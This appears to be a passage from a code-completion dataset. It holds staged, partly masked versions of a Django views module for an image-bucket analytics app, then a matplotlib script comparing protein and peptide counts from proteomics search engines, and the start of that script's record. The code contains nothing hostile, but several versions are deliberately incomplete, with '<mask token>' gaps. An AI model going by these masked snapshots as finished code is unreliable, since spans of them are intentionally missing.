if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket1_id = request_data['bucket1_id']\n bucket2_id = request_data['bucket2_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef toggle_bucket(request):\n \"\"\"\n Toggles (activates/deactivates) a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n 
if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].toggle_bucket(bucket_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef interaction_round(request):\n \"\"\"\n Performs an interaction round, providing new image suggestions.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n user_feedback = json.loads(request.body)\n try:\n suggs = request.session['analytics'].interaction_round(user_feedback)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(suggs, safe=False)\n\n\n@require_POST\ndef bucket_view_data(request):\n \"\"\"\n Obtains bucket view data, i.e., the images in the bucket with bucket\n confidences.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_id, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\ndef toggle_mode(request):\n \"\"\"\n Toggles between Tetris/grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request.session['analytics'].toggle_mode()\n return JsonResponse({})\n\n\n@require_POST\ndef grid_set_size(request):\n \"\"\"\n Resizes the grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n dim = request_data['dim']\n new_size = request_data['new_size']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n new_grid_data = request.session['analytics'].grid_set_size(dim,\n new_size)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(new_grid_data, safe=False)\n\n\n@require_POST\ndef transfer_images(request):\n \"\"\"\n Transfers (moves/copies) images between buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n images = request_data['images']\n bucket_src = request_data['bucket_src']\n bucket_dst = request_data['bucket_dst']\n mode = request_data['mode']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].transfer_images(images, bucket_src,\n bucket_dst, mode)\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_src, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\n<mask token>\n\n\n@require_POST\ndef ff_commit(request):\n \"\"\"\n Commits a fast-forward.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n print(request_data)\n try:\n bucket = request_data['bucket']\n except KeyError:\n 
err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].ff_commit(bucket)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\ndef end_session(request):\n \"\"\"\n Ends an analytic session.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n del request.session['analytics']\n response = {'redirect_url': '/main'}\n return JsonResponse(response)\n",
"step-3": "<mask token>\n\n\ndef index(request, err_msg=None):\n \"\"\"\n Renders the index page.\n \"\"\"\n template = loader.get_template('aimodel/index.html')\n context = {}\n context['err_msg'] = err_msg\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef log_in(request):\n \"\"\"\n Handles login.\n \"\"\"\n username = request.POST.get('username')\n password = request.POST.get('password')\n if not username or not password:\n return index(request, 'Invalid credentials!')\n user = authenticate(username=username, password=password)\n if user:\n login(request, user)\n return redirect('/main')\n else:\n return index(request, 'Invalid credentials!')\n\n\ndef main(request):\n \"\"\"\n Renders the main page behind login.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n template = loader.get_template('aimodel/main.html')\n context = dict()\n context['datasets'] = DatasetConfigManager.loaded_datasets_list()\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef analytics_session(request):\n \"\"\"\n Starts a new analytic session.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n try:\n dataset = request.POST['dataset']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n if 'analytics' in request.session:\n del request.session['analytics']\n request.session['analytics'] = AnalyticSession(dataset)\n bucket_info = request.session['analytics'].bucket_info()\n template = loader.get_template('ui/analytics.html')\n context = dict()\n context['init_buckets'] = json.dumps(bucket_info['buckets'])\n context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']\n )\n return HttpResponse(template.render(context, request))\n\n\ndef log_out(request):\n \"\"\"\n Logs the user out.\n \"\"\"\n if request.user.is_authenticated:\n logout(request)\n return redirect('/')\n\n\ndef _check_session_valid(request):\n \"\"\"\n A helper function checking whether the user is logged in and the session\n data is present.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason='Access denied!')\n if 'analytics' not in request.session:\n err = 'Could not fetch analytic session data.'\n return HttpResponseBadRequest(reason=err)\n return None\n\n\ndef bucket_info(request):\n \"\"\"\n Fetches information about current buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n return JsonResponse(request.session['analytics'].bucket_info())\n\n\n<mask token>\n\n\n@require_POST\ndef rename_bucket(request):\n \"\"\"\n Renames a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n new_bucket_name = request_data['new_bucket_name']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef swap_buckets(request):\n \"\"\"\n Swaps the position of two buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket1_id = request_data['bucket1_id']\n bucket2_id = request_data['bucket2_id']\n except KeyError:\n err = 
'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef toggle_bucket(request):\n \"\"\"\n Toggles (activates/deactivates) a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].toggle_bucket(bucket_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef interaction_round(request):\n \"\"\"\n Performs an interaction round, providing new image suggestions.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n user_feedback = json.loads(request.body)\n try:\n suggs = request.session['analytics'].interaction_round(user_feedback)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(suggs, safe=False)\n\n\n@require_POST\ndef bucket_view_data(request):\n \"\"\"\n Obtains bucket view data, i.e., the images in the bucket with bucket\n confidences.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_id, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\ndef toggle_mode(request):\n \"\"\"\n Toggles between Tetris/grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request.session['analytics'].toggle_mode()\n return JsonResponse({})\n\n\n@require_POST\ndef grid_set_size(request):\n \"\"\"\n Resizes the grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n dim = request_data['dim']\n new_size = request_data['new_size']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n new_grid_data = request.session['analytics'].grid_set_size(dim,\n new_size)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(new_grid_data, safe=False)\n\n\n@require_POST\ndef transfer_images(request):\n \"\"\"\n Transfers (moves/copies) images between buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n images = request_data['images']\n bucket_src = request_data['bucket_src']\n bucket_dst = request_data['bucket_dst']\n mode = request_data['mode']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].transfer_images(images, bucket_src,\n bucket_dst, mode)\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_src, sort_by)\n except ValueError as e:\n return 
HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\n<mask token>\n\n\n@require_POST\ndef ff_commit(request):\n \"\"\"\n Commits a fast-forward.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n print(request_data)\n try:\n bucket = request_data['bucket']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].ff_commit(bucket)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\ndef end_session(request):\n \"\"\"\n Ends an analytic session.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n del request.session['analytics']\n response = {'redirect_url': '/main'}\n return JsonResponse(response)\n",
"step-4": "<mask token>\n\n\ndef index(request, err_msg=None):\n \"\"\"\n Renders the index page.\n \"\"\"\n template = loader.get_template('aimodel/index.html')\n context = {}\n context['err_msg'] = err_msg\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef log_in(request):\n \"\"\"\n Handles login.\n \"\"\"\n username = request.POST.get('username')\n password = request.POST.get('password')\n if not username or not password:\n return index(request, 'Invalid credentials!')\n user = authenticate(username=username, password=password)\n if user:\n login(request, user)\n return redirect('/main')\n else:\n return index(request, 'Invalid credentials!')\n\n\ndef main(request):\n \"\"\"\n Renders the main page behind login.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n template = loader.get_template('aimodel/main.html')\n context = dict()\n context['datasets'] = DatasetConfigManager.loaded_datasets_list()\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef analytics_session(request):\n \"\"\"\n Starts a new analytic session.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n try:\n dataset = request.POST['dataset']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n if 'analytics' in request.session:\n del request.session['analytics']\n request.session['analytics'] = AnalyticSession(dataset)\n bucket_info = request.session['analytics'].bucket_info()\n template = loader.get_template('ui/analytics.html')\n context = dict()\n context['init_buckets'] = json.dumps(bucket_info['buckets'])\n context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']\n )\n return HttpResponse(template.render(context, request))\n\n\ndef log_out(request):\n \"\"\"\n Logs the user out.\n \"\"\"\n if request.user.is_authenticated:\n logout(request)\n return redirect('/')\n\n\ndef _check_session_valid(request):\n \"\"\"\n A helper function checking whether the user is logged in and the session\n data is present.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason='Access denied!')\n if 'analytics' not in request.session:\n err = 'Could not fetch analytic session data.'\n return HttpResponseBadRequest(reason=err)\n return None\n\n\ndef bucket_info(request):\n \"\"\"\n Fetches information about current buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n return JsonResponse(request.session['analytics'].bucket_info())\n\n\ndef create_bucket(request):\n \"\"\"\n Creates a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n try:\n request.session['analytics'].create_bucket()\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n<mask token>\n\n\n@require_POST\ndef rename_bucket(request):\n \"\"\"\n Renames a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n new_bucket_name = request_data['new_bucket_name']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef 
swap_buckets(request):\n \"\"\"\n Swaps the position of two buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket1_id = request_data['bucket1_id']\n bucket2_id = request_data['bucket2_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef toggle_bucket(request):\n \"\"\"\n Toggles (activates/deactivates) a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].toggle_bucket(bucket_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef interaction_round(request):\n \"\"\"\n Performs an interaction round, providing new image suggestions.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n user_feedback = json.loads(request.body)\n try:\n suggs = request.session['analytics'].interaction_round(user_feedback)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(suggs, safe=False)\n\n\n@require_POST\ndef bucket_view_data(request):\n \"\"\"\n Obtains bucket view data, i.e., the images in the bucket with bucket\n confidences.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_id, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\ndef toggle_mode(request):\n \"\"\"\n Toggles between Tetris/grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request.session['analytics'].toggle_mode()\n return JsonResponse({})\n\n\n@require_POST\ndef grid_set_size(request):\n \"\"\"\n Resizes the grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n dim = request_data['dim']\n new_size = request_data['new_size']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n new_grid_data = request.session['analytics'].grid_set_size(dim,\n new_size)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(new_grid_data, safe=False)\n\n\n@require_POST\ndef transfer_images(request):\n \"\"\"\n Transfers (moves/copies) images between buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n images = request_data['images']\n bucket_src = request_data['bucket_src']\n bucket_dst = request_data['bucket_dst']\n mode = request_data['mode']\n sort_by = 
request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].transfer_images(images, bucket_src,\n bucket_dst, mode)\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_src, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\n@require_POST\ndef fast_forward(request):\n \"\"\"\n Fast-forwards a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket = request_data['bucket']\n n_ff = request_data['n_ff']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].fast_forward(bucket, n_ff)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef ff_commit(request):\n \"\"\"\n Commits a fast-forward.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n print(request_data)\n try:\n bucket = request_data['bucket']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].ff_commit(bucket)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\ndef end_session(request):\n \"\"\"\n Ends an analytic session.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n del request.session['analytics']\n response = {'redirect_url': '/main'}\n return JsonResponse(response)\n",
"step-5": "from django.contrib.auth import authenticate, login, logout\nfrom django.template import loader\nfrom django.http import (HttpResponse, JsonResponse,\n HttpResponseForbidden, HttpResponseBadRequest)\nfrom django.shortcuts import redirect\nfrom django.views.decorators.http import require_POST\n\nimport json\n\nfrom aimodel.AnalyticSession import AnalyticSession\nfrom data.DatasetConfigManager import DatasetConfigManager\n\n\ndef index(request, err_msg=None):\n \"\"\"\n Renders the index page.\n \"\"\"\n template = loader.get_template(\"aimodel/index.html\")\n context = {}\n\n context[\"err_msg\"] = err_msg\n\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef log_in(request):\n \"\"\"\n Handles login.\n \"\"\"\n\n # Get the username and password\n username = request.POST.get(\"username\")\n password = request.POST.get(\"password\")\n\n if not username or not password:\n return index(request, \"Invalid credentials!\")\n\n # Authenticate and log in\n user = authenticate(username=username, password=password)\n\n if user:\n login(request, user)\n return redirect(\"/main\")\n else:\n return index(request, \"Invalid credentials!\")\n\n\ndef main(request):\n \"\"\"\n Renders the main page behind login.\n \"\"\"\n\n if not request.user.is_authenticated:\n return redirect(\"/\")\n\n template = loader.get_template(\"aimodel/main.html\")\n context = dict()\n context[\"datasets\"] = DatasetConfigManager.loaded_datasets_list()\n\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef analytics_session(request):\n \"\"\"\n Starts a new analytic session.\n \"\"\"\n\n if not request.user.is_authenticated:\n return redirect(\"/\")\n\n try:\n dataset = request.POST[\"dataset\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n if \"analytics\" in request.session:\n del request.session[\"analytics\"]\n\n request.session[\"analytics\"] = AnalyticSession(dataset)\n\n bucket_info = request.session[\"analytics\"].bucket_info()\n\n template = loader.get_template(\"ui/analytics.html\")\n\n context = dict()\n context[\"init_buckets\"] = json.dumps(bucket_info[\"buckets\"])\n context[\"init_bucket_ordering\"] =\\\n json.dumps(bucket_info[\"bucket_ordering\"])\n\n return HttpResponse(template.render(context, request))\n\n\ndef log_out(request):\n \"\"\"\n Logs the user out.\n \"\"\"\n\n if request.user.is_authenticated:\n logout(request)\n\n return redirect(\"/\")\n\n\ndef _check_session_valid(request):\n \"\"\"\n A helper function checking whether the user is logged in and the session\n data is present.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason=\"Access denied!\")\n\n if \"analytics\" not in request.session:\n err = \"Could not fetch analytic session data.\"\n return HttpResponseBadRequest(reason=err)\n\n return None\n\n\ndef bucket_info(request):\n \"\"\"\n Fetches information about current buckets.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n return JsonResponse(request.session[\"analytics\"].bucket_info())\n\n\ndef create_bucket(request):\n \"\"\"\n Creates a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n try:\n request.session[\"analytics\"].create_bucket()\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\n@require_POST\ndef delete_bucket(request):\n \"\"\"\n Deletes a 
bucket.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n bucket_id = request_data[\"bucket_id\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].delete_bucket(bucket_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\n@require_POST\ndef rename_bucket(request):\n \"\"\"\n Renames a bucket.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n bucket_id = request_data[\"bucket_id\"]\n new_bucket_name = request_data[\"new_bucket_name\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].rename_bucket(bucket_id, new_bucket_name)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\n@require_POST\ndef swap_buckets(request):\n \"\"\"\n Swaps the position of two buckets.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n bucket1_id = request_data[\"bucket1_id\"]\n bucket2_id = request_data[\"bucket2_id\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].swap_buckets(bucket1_id, bucket2_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\n@require_POST\ndef toggle_bucket(request):\n \"\"\"\n Toggles (activates/deactivates) a bucket.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n bucket_id = request_data[\"bucket_id\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].toggle_bucket(bucket_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\n@require_POST\ndef interaction_round(request):\n \"\"\"\n Performs an interaction round, providing new image suggestions.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n user_feedback = json.loads(request.body)\n\n try:\n suggs = request.session[\"analytics\"].interaction_round(user_feedback)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse(suggs, safe=False)\n\n\n@require_POST\ndef bucket_view_data(request):\n \"\"\"\n Obtains bucket view data, i.e., the images in the bucket with bucket\n confidences.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n bucket_id = request_data[\"bucket_id\"]\n sort_by = request_data[\"sort_by\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n bucket_view_data =\\\n request.session[\"analytics\"].bucket_view_data(bucket_id, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse(bucket_view_data, safe=False)\n\n\ndef toggle_mode(request):\n \"\"\"\n Toggles between Tetris/grid.\n \"\"\"\n\n 
session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request.session[\"analytics\"].toggle_mode()\n\n return JsonResponse({})\n\n\n@require_POST\ndef grid_set_size(request):\n \"\"\"\n Resizes the grid.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n dim = request_data[\"dim\"]\n new_size = request_data[\"new_size\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n new_grid_data = request.session[\"analytics\"].grid_set_size(dim,\n new_size)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse(new_grid_data, safe=False)\n\n\n@require_POST\ndef transfer_images(request):\n \"\"\"\n Transfers (moves/copies) images between buckets.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n images = request_data[\"images\"]\n bucket_src = request_data[\"bucket_src\"]\n bucket_dst = request_data[\"bucket_dst\"]\n mode = request_data[\"mode\"]\n sort_by = request_data[\"sort_by\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].transfer_images(images,\n bucket_src, bucket_dst,\n mode)\n bucket_view_data =\\\n request.session[\"analytics\"].bucket_view_data(bucket_src, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse(bucket_view_data, safe=False)\n\n\n@require_POST\ndef fast_forward(request):\n \"\"\"\n Fast-forwards a bucket.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n bucket = request_data[\"bucket\"]\n n_ff = request_data[\"n_ff\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].fast_forward(bucket, n_ff)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\n@require_POST\ndef ff_commit(request):\n \"\"\"\n Commits a fast-forward.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n print(request_data)\n\n try:\n bucket = request_data[\"bucket\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].ff_commit(bucket)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\ndef end_session(request):\n \"\"\"\n Ends an analytic session.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n del request.session[\"analytics\"]\n\n response = {\n \"redirect_url\": \"/main\"\n }\n\n return JsonResponse(response)\n",
"step-ids": [
13,
16,
17,
19,
22
]
}
|
[
13,
16,
17,
19,
22
]
|
import matplotlib.pyplot as plt
file_list = ["Quantification_comet_fdr.csv",
"Quantification_crux_fdr.csv",
"Quantification_msfg_fdr.csv",
"Quantification_msfg_percolator.csv"]
file_titles = ["Comet",
"Crux",
"MSGFPlus",
"MSGFPlus + Percolator"]
protein_list = []
peptides_list = []
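# Totals are appended in file_list order, so they line up with file_titles below.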
for file_name in file_list:
    proteins = 0  # n of proteins
    peptides = 0
    with open(file_name, 'r') as quant_file:  # close the file deterministically
        for line_index, line in enumerate(quant_file):
            if line_index > 3:  # Proteins are listed after row 4
                proteins += 1
                peptides += int(line.split('\t')[3])  # n_peptides is in column 4
    protein_list.append(proteins)
    peptides_list.append(peptides)
    print(f"{file_name} is done")
plt.bar(file_titles,
protein_list,
color=['black', 'red', 'green', 'blue', 'cyan'],
edgecolor='blue')
plt.title("Comparing proteins found")
plt.ylabel("Number of proteins matched")
plt.tight_layout() # Fixes cut off labels
plt.savefig("search_engines_proteins.png")
plt.figure()  # start a new figure so the peptide chart is not drawn over the protein bars
plt.bar(file_titles,
peptides_list,
color=['black', 'red', 'green', 'blue', 'cyan'],
edgecolor='blue')
plt.title("Comparing amount of peptides matched")
plt.ylabel("Total amount of peptides matched")
plt.tight_layout() # Fixes cut off labels
plt.savefig("search_engines_peptides.png")
|
normal
|
{
"blob_id": "e08159a51b611ce6d0ca354a4fe6759d00af2cb7",
"index": 660,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor file_name in file_list:\n proteins = 0\n peptides = 0\n for line_index, line in enumerate(open(file_name, 'r')):\n if line_index > 3:\n proteins += 1\n peptides += int(line.split('\\t')[3])\n protein_list.append(proteins)\n peptides_list.append(peptides)\n print(f'{file_name} is done')\nplt.bar(file_titles, protein_list, color=['black', 'red', 'green', 'blue',\n 'cyan'], edgecolor='blue')\nplt.title('Comparing proteins found')\nplt.ylabel('Number of proteins matched')\nplt.tight_layout()\nplt.savefig('search_engines_proteins.png')\nplt.bar(file_titles, peptides_list, color=['black', 'red', 'green', 'blue',\n 'cyan'], edgecolor='blue')\nplt.title('Comparing amount of peptides matched')\nplt.ylabel('Total amount of peptides matched')\nplt.tight_layout()\nplt.savefig('search_engines_peptides.png')\n",
